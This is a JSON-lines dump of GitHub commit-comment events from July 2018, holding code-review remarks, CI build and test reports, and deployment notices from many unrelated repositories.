{"id":"7952225946","type":"CommitCommentEvent","actor":{"login":"alphapapa"},"repo":{"name":"alphapapa/helm-org-rifle"},"payload":{"comment":{"id":29676063,"position":null,"line":null,"path":null,"commit_id":"9e71e824d17f76bd93d0c8d5344a444363c71b5d","created_at":"2018-07-11T19:49:03Z","updated_at":"2018-07-11T19:49:03Z","author_association":"OWNER","body":"@akirak If you have time and are interested, I would appreciate your feedback on this change (the effects of the change, not the code itself, although I welcome feedback on the code as well).  I think this should preserve default behavior while increasing performance when `helm-org-rifle-show-path` is enabled (which is not the default, but I wonder if it now should be)."}},"created_at":"2018-07-11T19:49:03Z"}
{"id":"7952227425","type":"CommitCommentEvent","actor":{"login":"lukas-h"},"repo":{"name":"dartclub/dartlang.rocks"},"payload":{"comment":{"id":29676065,"position":null,"line":null,"path":null,"commit_id":"c41098b44af1d91ecf9f9dfc6f71613b039ca0b3","created_at":"2018-07-11T19:49:22Z","updated_at":"2018-07-11T19:49:22Z","author_association":"MEMBER","body":":+1: "}},"created_at":"2018-07-11T19:49:22Z"}
{"id":"7952227505","type":"CommitCommentEvent","actor":{"login":"talweiss1982"},"repo":{"name":"ravendb/ravendb"},"payload":{"comment":{"id":29676066,"position":25,"line":198,"path":"src/Raven.Client/Documents/Subscriptions/SubscriptionWorker.cs","commit_id":"6676a2bfc5c6fe9b58ca4a6521aa0e9eecc8be8e","created_at":"2018-07-11T19:49:23Z","updated_at":"2018-07-11T19:49:23Z","author_association":"MEMBER","body":"Nothing had changed since RTM"}},"created_at":"2018-07-11T19:49:23Z"}
{"id":"7952230696","type":"CommitCommentEvent","actor":{"login":"acastillo2015"},"repo":{"name":"acastillo2015/startboot"},"payload":{"comment":{"id":29676075,"position":null,"line":null,"path":null,"commit_id":"54a00764d9a16651e85fd4ff5aa0f7192c3516d6","created_at":"2018-07-11T19:50:05Z","updated_at":"2018-07-11T19:50:05Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/0c1e5e36-26ce-45db-8770-33a334102862?env_id=ibm%3Ayp%3Aus-south \"AJCEv2\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/7f2e58ba-71a5-490a-a062-38a7f84b912a?env_id=ibm%3Ayp%3Aus-south \"Pipeline\") deployed [startboot](https://github.com/acastillo2015/startboot/releases/tag/deploy-ibm-yp-us-south-acastillo-cl.ibm.com-Meetup-Chile-20180711-195005 \"deploy-ibm-yp-us-south-acastillo-cl.ibm.com-Meetup-Chile-20180711-195005\") to [Meetup Chile](https://console.bluemix.net/apps/e667e4d5-3a72-476e-a4e8-b4bb3eed3ee2?env_id=ibm:yp:us-south \"ibm:yp:us-south:acastillo@cl.ibm.com:Meetup Chile\"), including this commit"}},"created_at":"2018-07-11T19:50:05Z"}
{"id":"7952231859","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29676077,"position":null,"line":null,"path":null,"commit_id":"71ab33f8dd7b7b6d27d01ffb0a289f3650cf613c","created_at":"2018-07-11T19:50:20Z","updated_at":"2018-07-11T19:50:20Z","author_association":"COLLABORATOR","body":"<h3>[MenuItem] fix submenu style (#2676)</h3>\n\nPreview: <strong><a href='https://18394-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18394-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18394-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-11T19:50:20Z"}
{"id":"7952233186","type":"CommitCommentEvent","actor":{"login":"alamusi"},"repo":{"name":"EOS9Cat/documentation"},"payload":{"comment":{"id":29676079,"position":47,"line":47,"path":"Reason and Solution for 'the database dirty flag set' and Snapshot Backup&Restore/Reason and Solution for 'database dirty flag' and Snapshot Backup&Restore.md","commit_id":"d798c9f89a05e2a35017a97b782fd1b110aebb66","created_at":"2018-07-11T19:50:38Z","updated_at":"2018-07-11T19:50:38Z","author_association":"NONE","body":"Backing up a running node renders the database flagged invalid and defeats the purpose of a reusable backup. Knowing the root cause of the problem, now we are able to start / stop the EOS node with data integrity at any given time. This is the prerequisite for the clean **backup & restore**."}},"created_at":"2018-07-11T19:50:38Z"}
{"id":"7952236958","type":"CommitCommentEvent","actor":{"login":"shadowwalkersb"},"repo":{"name":"cryoem/eman2"},"payload":{"comment":{"id":29676089,"position":null,"line":null,"path":null,"commit_id":"5fbbfc0d9547805c123320c735d130937a801285","created_at":"2018-07-11T19:51:27Z","updated_at":"2018-07-11T19:51:27Z","author_association":"MEMBER","body":"Were you getting this error?\r\n`AttributeError: 'list' object has no attribute 'emit'`"}},"created_at":"2018-07-11T19:51:27Z"}
{"id":"7952237720","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29676090,"position":null,"line":null,"path":null,"commit_id":"ffc65fc967280947b0ae36a62c8263b7fd3e9b2a","created_at":"2018-07-11T19:51:37Z","updated_at":"2018-07-11T19:51:37Z","author_association":"COLLABORATOR","body":"<h3>[1.x] remove banner (#2677)</h3>\n\nPreview: <strong><a href='https://18401-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18401-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18401-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a> | <a href='' target='_blank'>github pages</a></strong>"}},"created_at":"2018-07-11T19:51:37Z"}
{"id":"7952242701","type":"CommitCommentEvent","actor":{"login":"codelionari"},"repo":{"name":"codelionari/PTTHW"},"payload":{"comment":{"id":29676101,"position":null,"line":null,"path":null,"commit_id":"ec24f0cf50a8a031ee1d62691837465414ec0007","created_at":"2018-07-11T19:52:42Z","updated_at":"2018-07-11T19:52:42Z","author_association":"OWNER","body":"i tried to do that trick you showed me...\r\n\r\nis it right to use ``` then input and close with the same thing?\r\n\r\nAlso I modified the file a bit to include some more important information"}},"created_at":"2018-07-11T19:52:42Z"}
{"id":"7952244611","type":"CommitCommentEvent","actor":{"login":"dbialek2"},"repo":{"name":"hortonworks/cloudbreak-documentation"},"payload":{"comment":{"id":29676103,"position":null,"line":null,"path":null,"commit_id":"5025e4ac8e238f3fcb699eebe27f94d2b8a315b8","created_at":"2018-07-11T19:53:06Z","updated_at":"2018-07-11T19:53:06Z","author_association":"CONTRIBUTOR","body":"@jtstorck  Added >  You can modify the value of nifi-bootstrap-env's \"content\" property, but the java.io.tmpdir arg is required to be populated with a directory that does not have noexec set on it, and the NiFi user must be able to write to that directory."}},"created_at":"2018-07-11T19:53:06Z"}
{"id":"7952247360","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29676108,"position":null,"line":null,"path":null,"commit_id":"e18624bbf4ae06e7eaf1a0bca1eab155f7f35d54","created_at":"2018-07-11T19:53:40Z","updated_at":"2018-07-11T19:53:40Z","author_association":"COLLABORATOR","body":"<h3>Publish</h3>\n\nPreview: <strong><a href='https://18406-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18406-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18406-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a> | <a href='' target='_blank'>github pages</a></strong>"}},"created_at":"2018-07-11T19:53:40Z"}
{"id":"7952252588","type":"CommitCommentEvent","actor":{"login":"lonoak"},"repo":{"name":"rediris-es/simplesamlphp-module-idpinstaller"},"payload":{"comment":{"id":29676114,"position":null,"line":null,"path":null,"commit_id":"736d499a5f49725a5030036abc56152f0b317813","created_at":"2018-07-11T19:54:45Z","updated_at":"2018-07-11T19:54:45Z","author_association":"CONTRIBUTOR","body":"Perfecto... intento probar mañana yo también y preparo nueva release."}},"created_at":"2018-07-11T19:54:45Z"}
{"id":"7952260587","type":"CommitCommentEvent","actor":{"login":"RReverser"},"repo":{"name":"tdewolff/minify"},"payload":{"comment":{"id":29676127,"position":7,"line":49,"path":"css/css_test.go","commit_id":"835afedd1a7d95549ad735ed1c5ba3d357e21674","created_at":"2018-07-11T19:56:28Z","updated_at":"2018-07-11T19:56:28Z","author_association":"CONTRIBUTOR","body":"Hmm this looks like a minification regression?"}},"created_at":"2018-07-11T19:56:28Z"}
{"id":"7952261240","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29676130,"position":null,"line":null,"path":null,"commit_id":"6b270bca0c70d67f23650a4d242d98ff26e87614","created_at":"2018-07-11T19:56:36Z","updated_at":"2018-07-11T19:56:36Z","author_association":"NONE","body":"issue_6736 (mbadams5) - Win64-Windows-7-VisualStudio-14: OK (2932 of 2933 tests passed, 117 test warnings)\n\nMessages:\n\n * 100 tests had: AUD diffs.\n * 2 tests had: ERR diffs.\n * 16 tests had: Table small diffs.\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 624\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6b270bca0c70d67f23650a4d242d98ff26e87614-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6b270bca0c70d67f23650a4d242d98ff26e87614-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-11T19:56:36Z"}
{"id":"7952266027","type":"CommitCommentEvent","actor":{"login":"michaelfitzhavey"},"repo":{"name":"holistic-web/website-claud"},"payload":{"comment":{"id":29676140,"position":5,"line":7,"path":"src/App.vue","commit_id":"d86ce64951c6788515491cb266adb5f474d7e274","created_at":"2018-07-11T19:57:37Z","updated_at":"2018-07-11T19:57:37Z","author_association":"CONTRIBUTOR","body":"indentation here was correct"}},"created_at":"2018-07-11T19:57:37Z"}
{"id":"7952266253","type":"CommitCommentEvent","actor":{"login":"MarkEWaite"},"repo":{"name":"jenkinsci/git-client-plugin"},"payload":{"comment":{"id":29676142,"position":null,"line":null,"path":null,"commit_id":"dbcec24aca49797b45042dc69378d19067e4c60a","created_at":"2018-07-11T19:57:40Z","updated_at":"2018-07-11T19:57:40Z","author_association":"CONTRIBUTOR","body":"The check for `git fetch` is useful because there have been several requests to replace the fetch based implementation with an implementation based on `git clone`.  There are several features within the plugin (like honoring refspec on initial creation) which are not feasible in a `git clone` based implementation.  The check serves as one of many reminders that `git fetch` is used intentionally.\r\n\r\nThe check for a reference repository is useful because reference repositories are a way to significantly reduce the data transfer between the remote git server and the local repository.  The check is a convenient safeguard against loss of the reference repository functionality.\r\n\r\nI want those checks included, either as the expected log string check they were using previously, or as a JUnit verify step."}},"created_at":"2018-07-11T19:57:40Z"}
{"id":"7952267401","type":"CommitCommentEvent","actor":{"login":"michaelfitzhavey"},"repo":{"name":"holistic-web/website-claud"},"payload":{"comment":{"id":29676147,"position":2,"line":5,"path":"src/App.vue","commit_id":"d86ce64951c6788515491cb266adb5f474d7e274","created_at":"2018-07-11T19:57:54Z","updated_at":"2018-07-11T19:57:54Z","author_association":"CONTRIBUTOR","body":"there should be an extra space here (small one lol)"}},"created_at":"2018-07-11T19:57:54Z"}
{"id":"7952270491","type":"CommitCommentEvent","actor":{"login":"venguix"},"repo":{"name":"venguix/The-MRI-Student"},"payload":{"comment":{"id":29676154,"position":null,"line":null,"path":null,"commit_id":"be88a6bc438fd2cda88daac9e390ff2dbb236539","created_at":"2018-07-11T19:58:34Z","updated_at":"2018-07-11T19:58:34Z","author_association":"OWNER","body":"Theme selection"}},"created_at":"2018-07-11T19:58:34Z"}
{"id":"7952271518","type":"CommitCommentEvent","actor":{"login":"michaelfitzhavey"},"repo":{"name":"holistic-web/website-claud"},"payload":{"comment":{"id":29676158,"position":3,"line":2,"path":"src/containers/Beauty/Detail.vue","commit_id":"d86ce64951c6788515491cb266adb5f474d7e274","created_at":"2018-07-11T19:58:46Z","updated_at":"2018-07-11T19:58:46Z","author_association":"CONTRIBUTOR","body":"recommend using capitals to signify class represents a section not a component:\r\n\r\n`Beauty`"}},"created_at":"2018-07-11T19:58:46Z"}
{"id":"7952273424","type":"CommitCommentEvent","actor":{"login":"jeanCarloMachado"},"repo":{"name":"sergiors/gyg-scheduler"},"payload":{"comment":{"id":29676166,"position":null,"line":null,"path":null,"commit_id":"f9de1601cf1be676eeb4347973f2bec19b9be496","created_at":"2018-07-11T19:59:10Z","updated_at":"2018-07-11T19:59:10Z","author_association":"NONE","body":"AHAAHAHAHAHAHAHA. Não vai funcionar, na minha spec o getter vai retornar um generator pra paginar de forma transparente. #Toda a boa ação será castigada."}},"created_at":"2018-07-11T19:59:10Z"}
{"id":"7952277294","type":"CommitCommentEvent","actor":{"login":"stepan662"},"repo":{"name":"stepan662/pm-project"},"payload":{"comment":{"id":29676171,"position":null,"line":null,"path":null,"commit_id":"0ae06261feaf2c2bbfc09bf60f8e13125738e36e","created_at":"2018-07-11T19:59:59Z","updated_at":"2018-07-11T19:59:59Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/6c16d8a2-ebdf-40b3-84aa-4f64c1677c5a?env_id=ibm%3Ayp%3Aeu-gb \"pm-project\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/f6f26577-1de5-4767-bae6-b07df1071588?env_id=ibm%3Ayp%3Aeu-gb \"pm-project\") deployed [pm-project](https://github.com/stepan662/pm-project/releases/tag/deploy-ibm-yp-eu-gb-granat.stepan-gmail.com-prod-20180711-195952 \"deploy-ibm-yp-eu-gb-granat.stepan-gmail.com-prod-20180711-195952\") to [prod](https://console.bluemix.net/apps/620199c4-b1de-471c-ba4b-c21ba0db876a?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:granat.stepan@gmail.com:prod\"), including this commit"}},"created_at":"2018-07-11T19:59:59Z"}
{"id":"7947316847","type":"CommitCommentEvent","actor":{"login":"teor2345"},"repo":{"name":"nmathewson/privcount_shamir"},"payload":{"comment":{"id":29665303,"position":7,"line":125,"path":"rust/src/math.rs","commit_id":"6d8f761fd0077f864b8425db9f4bb57c79eefd37","created_at":"2018-07-11T02:01:46Z","updated_at":"2018-07-11T02:01:46Z","author_association":"CONTRIBUTOR","body":"2^-62 ?"}},"created_at":"2018-07-11T02:01:46Z"}
{"id":"7947321451","type":"CommitCommentEvent","actor":{"login":"stanfordquan"},"repo":{"name":"gslab-econ/template"},"payload":{"comment":{"id":29665313,"position":null,"line":null,"path":null,"commit_id":"4898e4b6f763bc25b527718b535d18a36f4e1b17","created_at":"2018-07-11T02:03:34Z","updated_at":"2018-07-11T02:03:34Z","author_association":"CONTRIBUTOR","body":"#107 "}},"created_at":"2018-07-11T02:03:34Z"}
{"id":"7947322402","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29665317,"position":null,"line":null,"path":null,"commit_id":"4141408d7ae32de2dda770f0ef9f9add8c2949cd","created_at":"2018-07-11T02:03:57Z","updated_at":"2018-07-11T02:03:57Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.214`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*CircleCI*](https://circleci.com/gh/streamich/ci-scripts/214) :tada:"}},"created_at":"2018-07-11T02:03:57Z"}
{"id":"7947325420","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29665320,"position":null,"line":null,"path":null,"commit_id":"4141408d7ae32de2dda770f0ef9f9add8c2949cd","created_at":"2018-07-11T02:05:05Z","updated_at":"2018-07-11T02:05:05Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.324`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/402479112) :tada:"}},"created_at":"2018-07-11T02:05:05Z"}
{"id":"7947331049","type":"CommitCommentEvent","actor":{"login":"teor2345"},"repo":{"name":"nmathewson/privcount_shamir"},"payload":{"comment":{"id":29665328,"position":22,"line":89,"path":"rust/src/data.rs","commit_id":"8eee9e1ffaf63a94a9027b7bf9d4f8c72bd02a5d","created_at":"2018-07-11T02:07:19Z","updated_at":"2018-07-11T02:07:19Z","author_association":"CONTRIBUTOR","body":"With 1 mask, we will panic here with probability (1/2^32 + 1/2^62)^5 ~= 1/2^160.\r\nThat's ok, because it's approximately the memory bit error rate.\r\n(And in practice, we will ask for >=3 masks, which increases the outer power to >=6.)"}},"created_at":"2018-07-11T02:07:19Z"}
{"id":"7947349690","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/nano-css"},"payload":{"comment":{"id":29665358,"position":null,"line":null,"path":null,"commit_id":"c0168dc31b9b7beae99694be7d42a59048bd3fdf","created_at":"2018-07-11T02:14:37Z","updated_at":"2018-07-11T02:14:37Z","author_association":"OWNER","body":"Build version: __`2.1.0-renovate/node-8.x.39`__ :crossed_fingers: [`renovate/node-8.x`](https://github.com/streamich/nano-css/tree/renovate/node-8.x) on [*CircleCI*](https://circleci.com/gh/streamich/nano-css/39) :tada:"}},"created_at":"2018-07-11T02:14:37Z"}
{"id":"7947350280","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/nano-css"},"payload":{"comment":{"id":29665363,"position":null,"line":null,"path":null,"commit_id":"d0821eedcda56be152644288f7d6c3a1b98974ad","created_at":"2018-07-11T02:14:51Z","updated_at":"2018-07-11T02:14:51Z","author_association":"OWNER","body":"Build version: __`2.1.0-renovate/prop-types-15.x.41`__ :crossed_fingers: [`renovate/prop-types-15.x`](https://github.com/streamich/nano-css/tree/renovate/prop-types-15.x) on [*CircleCI*](https://circleci.com/gh/streamich/nano-css/41) :tada:"}},"created_at":"2018-07-11T02:14:51Z"}
{"id":"7947350302","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/nano-css"},"payload":{"comment":{"id":29665365,"position":null,"line":null,"path":null,"commit_id":"b30cd1401745a4e29437cde4c0c723534d56dfd0","created_at":"2018-07-11T02:14:51Z","updated_at":"2018-07-11T02:14:51Z","author_association":"OWNER","body":"Build version: __`2.1.0-renovate/react-16.x.42`__ :crossed_fingers: [`renovate/react-16.x`](https://github.com/streamich/nano-css/tree/renovate/react-16.x) on [*CircleCI*](https://circleci.com/gh/streamich/nano-css/42) :tada:"}},"created_at":"2018-07-11T02:14:51Z"}
{"id":"7947351723","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29665369,"position":null,"line":null,"path":null,"commit_id":"d022a70906164211e1cfaa73227b73080583f16e","created_at":"2018-07-11T02:15:23Z","updated_at":"2018-07-11T02:15:23Z","author_association":"NONE","body":"158922394_Issue#4431 (Nigusse) - x86_64-MacOS-10.9-clang: OK (2786 of 2933 tests passed, 9 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n * 149 tests had: EIO diffs.\n * 146 tests had: Table big diffs.\n * 9 tests had: ESO small diffs.\n * 4 tests had: MTR small diffs.\n * 18 tests had: ESO big diffs.\n * 1 test had: ERR diffs.\n * 6 tests had: MTR big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 476\n * Failed: 147\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d022a70906164211e1cfaa73227b73080583f16e-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d022a70906164211e1cfaa73227b73080583f16e-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-94.99%25-yellow.png)</a> \n"}},"created_at":"2018-07-11T02:15:23Z"}
{"id":"7947357697","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29665385,"position":null,"line":null,"path":null,"commit_id":"8e299231ae22b084b442c498ef8b07ccfd313cf1","created_at":"2018-07-11T02:17:35Z","updated_at":"2018-07-11T02:17:35Z","author_association":"NONE","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1684 of 1684 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8e299231ae22b084b442c498ef8b07ccfd313cf1-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8e299231ae22b084b442c498ef8b07ccfd313cf1-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8e299231ae22b084b442c498ef8b07ccfd313cf1-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.0%25-green.png)</a>\n"}},"created_at":"2018-07-11T02:17:35Z"}
{"id":"7947363733","type":"CommitCommentEvent","actor":{"login":"snuggs"},"repo":{"name":"devpunks/snuggsi"},"payload":{"comment":{"id":29665398,"position":null,"line":null,"path":null,"commit_id":"849727b2f626cc28fe89dc40ff01c448b9cb558d","created_at":"2018-07-11T02:19:44Z","updated_at":"2018-07-11T02:19:44Z","author_association":"MEMBER","body":"@tmornini or perhaps just declare a variable. That's the cool part. the API needs no update (i believe unless you disagree). I remember in ruby people would write `do_something()` when in actuality `do(something)` \r\n\r\nOr more terse `do_something` -> `do something` probably gets the job done cleaner. \r\n\r\nFor instance\r\n\r\n```javascript\r\nlet path = '/public/'\r\n\r\nserve (public)\r\n```\r\n\r\nThe function **always** expects a string. Even if it's empty. The plus side is that's just code style not method signature. Which (as recommended) can always be changed. @brandondees  said he liked that at first he thought snuggsi was imposing unorthodoxed language constructs. When that's just my style of coding. can always fall back to `serve (directory)` :-) Perhaps update tests?\r\n\r\n/cc @btakita "}},"created_at":"2018-07-11T02:19:44Z"}
{"id":"7947364410","type":"CommitCommentEvent","actor":{"login":"ryantrinkle"},"repo":{"name":"obsidiansystems/obelisk"},"payload":{"comment":{"id":29665399,"position":null,"line":null,"path":null,"commit_id":"6061e513da52ded18f062356861ebbfc6099e540","created_at":"2018-07-11T02:19:59Z","updated_at":"2018-07-11T02:19:59Z","author_association":"MEMBER","body":"Lol, thanks!"}},"created_at":"2018-07-11T02:19:59Z"}
{"id":"7947366316","type":"CommitCommentEvent","actor":{"login":"rogercmq"},"repo":{"name":"rogercmq/STAGG"},"payload":{"comment":{"id":29665400,"position":null,"line":null,"path":null,"commit_id":"2db1481ed6aac2f72ae37bbf8dd1769008b9240a","created_at":"2018-07-11T02:20:41Z","updated_at":"2018-07-11T02:20:41Z","author_association":"OWNER","body":"comparison between benchmark and my topic entity"}},"created_at":"2018-07-11T02:20:41Z"}
{"id":"7947373247","type":"CommitCommentEvent","actor":{"login":"Niuliv587"},"repo":{"name":"Niuliv587/tensorflow-"},"payload":{"comment":{"id":29665406,"position":null,"line":null,"path":null,"commit_id":"2b841aab36c035ffa26f93cfb1a3c731f0ab0967","created_at":"2018-07-11T02:23:14Z","updated_at":"2018-07-11T02:23:14Z","author_association":"OWNER","body":"参考自http://www.cnblogs.com/denny402/p/6940134.html"}},"created_at":"2018-07-11T02:23:14Z"}
{"id":"7947392890","type":"CommitCommentEvent","actor":{"login":"quangtt"},"repo":{"name":"nampham148/post_to_twitter"},"payload":{"comment":{"id":29665433,"position":11,"line":11,"path":"lib/twitter_req.rb","commit_id":"193388ade304599de37ec1bce07ef2f49d4aefcd","created_at":"2018-07-11T02:30:21Z","updated_at":"2018-07-11T02:30:21Z","author_association":"NONE","body":"Nếu kết quả của đoạn `post_http` dùng để return luôn thì tốt nhất ko nên gán giá trị vào một biến khác, sẽ bị thừa mặc dù ko sai."}},"created_at":"2018-07-11T02:30:21Z"}
{"id":"7947393971","type":"CommitCommentEvent","actor":{"login":"quangtt"},"repo":{"name":"nampham148/post_to_twitter"},"payload":{"comment":{"id":29665437,"position":20,"line":20,"path":"lib/twitter_req.rb","commit_id":"193388ade304599de37ec1bce07ef2f49d4aefcd","created_at":"2018-07-11T02:30:43Z","updated_at":"2018-07-11T02:30:43Z","author_association":"NONE","body":"Thừa gán biến như trên"}},"created_at":"2018-07-11T02:30:43Z"}
{"id":"7947396487","type":"CommitCommentEvent","actor":{"login":"sshockwave"},"repo":{"name":"syniox/Online_Judge_solutions"},"payload":{"comment":{"id":29665444,"position":null,"line":null,"path":null,"commit_id":"08ed0b72b06a7f00d9f66ac27e7dc6453b45f30e","created_at":"2018-07-11T02:31:38Z","updated_at":"2018-07-11T02:31:38Z","author_association":"CONTRIBUTOR","body":"你的询问不是n log n的吧"}},"created_at":"2018-07-11T02:31:38Z"}
{"id":"7947399954","type":"CommitCommentEvent","actor":{"login":"quangtt"},"repo":{"name":"nampham148/post_to_twitter"},"payload":{"comment":{"id":29665450,"position":45,"line":45,"path":"lib/twitter_req.rb","commit_id":"193388ade304599de37ec1bce07ef2f49d4aefcd","created_at":"2018-07-11T02:32:52Z","updated_at":"2018-07-11T02:32:52Z","author_association":"NONE","body":"Cũng ko sai nhưng Ruby thường ko cần viết `return`, giá trị ở dòng cuối cùng của method sẽ được tự động return."}},"created_at":"2018-07-11T02:32:52Z"}
{"id":"7947400849","type":"CommitCommentEvent","actor":{"login":"Sim2164"},"repo":{"name":"aseylys/KStock"},"payload":{"comment":{"id":29665451,"position":null,"line":null,"path":null,"commit_id":"e60de98dba17a127e1b6919294b8f7ac09268b31","created_at":"2018-07-11T02:33:11Z","updated_at":"2018-07-11T02:33:11Z","author_association":"NONE","body":"First, I want to thank you so much for your contributions! I am new to python and coding and it runs well.\r\n\r\nI am having trouble changing the swing trade strategy and the code running successfully. Is there a way I can contact you directly via email?\r\n\r\nThank you"}},"created_at":"2018-07-11T02:33:11Z"}
{"id":"7947405652","type":"CommitCommentEvent","actor":{"login":"mps9506"},"repo":{"name":"mps9506/hugo-tint"},"payload":{"comment":{"id":29665458,"position":null,"line":null,"path":null,"commit_id":"c4745015289a995e95b7cb212113b66d8f9e1798","created_at":"2018-07-11T02:34:54Z","updated_at":"2018-07-11T02:34:54Z","author_association":"OWNER","body":"Fixes #2 "}},"created_at":"2018-07-11T02:34:54Z"}
{"id":"7947405671","type":"CommitCommentEvent","actor":{"login":"Fernando98dev"},"repo":{"name":"OliverAlmonte/ProyectoFinalP1"},"payload":{"comment":{"id":29665459,"position":null,"line":null,"path":null,"commit_id":"4d0f82c57a5f4f7069e3d017636d199f35ef6806","created_at":"2018-07-11T02:34:55Z","updated_at":"2018-07-11T02:34:55Z","author_association":"COLLABORATOR","body":"en la clase programadfor te falto declarar la variable string del lenguaje de prog y en la clase proyecto la fecha de incico y final del proyecto y el nombre del proyecto"}},"created_at":"2018-07-11T02:34:55Z"}
{"id":"7947410826","type":"CommitCommentEvent","actor":{"login":"ninjha01"},"repo":{"name":"ninjha01/cordoba"},"payload":{"comment":{"id":29665468,"position":null,"line":null,"path":null,"commit_id":"76f82ff7e148f3526ea0c66f312d2f36158bcc5c","created_at":"2018-07-11T02:36:45Z","updated_at":"2018-07-11T02:36:45Z","author_association":"OWNER","body":"Rough start to the first blog post, but hopefully a week of growing and cutting gets it to somewhat presentable status."}},"created_at":"2018-07-11T02:36:45Z"}
{"id":"7947416084","type":"CommitCommentEvent","actor":{"login":"BlaCkinkGJ"},"repo":{"name":"BlaCkinkGJ/SFSH"},"payload":{"comment":{"id":29665476,"position":null,"line":null,"path":null,"commit_id":"a91a92d311a3b362557caed663efd40b5b0cf245","created_at":"2018-07-11T02:38:34Z","updated_at":"2018-07-11T02:38:34Z","author_association":"OWNER","body":"DO npm install mongodb -g && npm init && npm link mongodb END"}},"created_at":"2018-07-11T02:38:34Z"}
{"id":"7947418654","type":"CommitCommentEvent","actor":{"login":"namidairo"},"repo":{"name":"KVM-VMI/libvmi"},"payload":{"comment":{"id":29665481,"position":68,"line":1900,"path":"libvmi/driver/kvm/kvm.c","commit_id":"178b70b438ae6c1b6ff40d11ef387298c0226133","created_at":"2018-07-11T02:39:31Z","updated_at":"2018-07-11T02:39:31Z","author_association":"NONE","body":"`#define MSR_FS_BASE\t\t0xc0000100\r\n#define MSR_GS_BASE\t\t0xc0000101`\r\n\r\nTherefore it should just be a couple more cases in translate_msr_index to implement these two?"}},"created_at":"2018-07-11T02:39:31Z"}
